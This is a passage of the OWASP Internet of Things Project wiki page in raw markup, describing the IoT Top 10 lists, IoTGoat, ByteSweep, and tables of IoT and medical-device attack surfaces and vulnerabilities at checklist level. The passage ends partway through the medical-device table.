# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
* IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten 2014 PDF]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* OWASP [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoTGoat IoTGoat Project] underway<br />
* New firmware security analysis tool, ByteSweep<br />
* IoT ASVS and Testing Guide set to kick off in 2019<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= OWASP IoT Top 10 2018 Mapping Project =<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Top 10 2018 Mapping Project ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings are structured with control categories, tests, or recommendations in the left column, descriptions in the middle column, and their mapping to the OWASP IoT Top 10 2018 list in the right column. Each mapping may not have a 1 to 1 relation; however, similar recommendations and/or controls are listed. For mappings that are not applicable to the IoT Top 10 2018 list, an "N/A" is provided as the mapping.<br />
<br />
An example mapping of the IoT Top 10 2014 is provided below. <br />
<br />
[[File:2014 2018Mapping.png|center|frameless|746x746px]]<br />
<br />
For additional mappings, please visit the following link: https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<nowiki/>{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Top 10 Mapping Project? ==<br />
<br />
The OWASP IoT Mapping Project is intended to provide a mapping of the OWASP IoT Top 10 2018 to industry publications and sister projects. The goal is to provide resources that enable practical uses for the OWASP IoT Top 10 . As with all Top 10 lists, they should be used as a first step and expanded upon according to the applicable IoT ecosystem. <br />
<br />
Mappings include the following:<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/owasp-iot-top-10-2014 OWASP IoT Top 10 2014]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/gsma-iot-security-assessment-checklist GSMA IoT Security Assessment Checklist]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/code-of-practice Code of Practice (UK Government)]<br />
* [https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/mappings/enisa-baseline-security-recommendations-for-iot ENISA Baseline Security Recommendations for IoT]<br />
<br />
and more...<br />
<br />
== GitBook ==<br />
Mappings are hosted on GitBook using the following link https://scriptingxss.gitbook.io/owasp-iot-top-10-mapping-project/<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
|}<br />
<br />
= IoTGoat =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
IoT Goat is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the top 10 vulnerabilities as documented by OWASP: [[OWASP_Internet_of_Things_Project|https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project]]. IoTGoat is expected to be released by December 2019. <br />
<br />
To get more information on getting started or how to contribute, visit the project's Github: https://github.com/scriptingxss/IoTGoat<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== GitHub ==<br />
https://github.com/scriptingxss/IoTGoat<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
* Fotios Chantzis<br />
* [[User:Calderpwn|Paulino Calderon]]<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
* NodeGoat<br />
* RailsGoat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
[https://groups.google.com/forum/#!forum/iotgoat IoTGoat Google Group]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= ByteSweep =<br />
[[File:OWASP_Project_Header.jpg|link=]]<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== ByteSweep Project ==<br />
<br />
ByteSweep is a Free Software IoT security analysis platform. This platform will allow IoT device makers, large and small, to conduct fully automated security checks before they ship firmware. A Free Software IoT Firmware Security Analysis Platform<br />
<br />
ByteSweep Features:<br />
* Firmware extraction<br />
* File data enrichment<br />
* Key and password hash identification<br />
* Unsafe function use detection<br />
* 3rd party component identification<br />
* CVE correlation<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ByteSweep Project? ==<br />
<br />
A Free Software IoT Firmware Security Analysis Platform.<br />
<br />
== GitLab ==<br />
https://gitlab.com/bytesweep/bytesweep<br />
<br />
== Project Leaders ==<br />
<br />
* Matt Brown<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* https://gitlab.com/bytesweep/bytesweep/blob/master/INSTALL.md<br />
<br />
|}<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
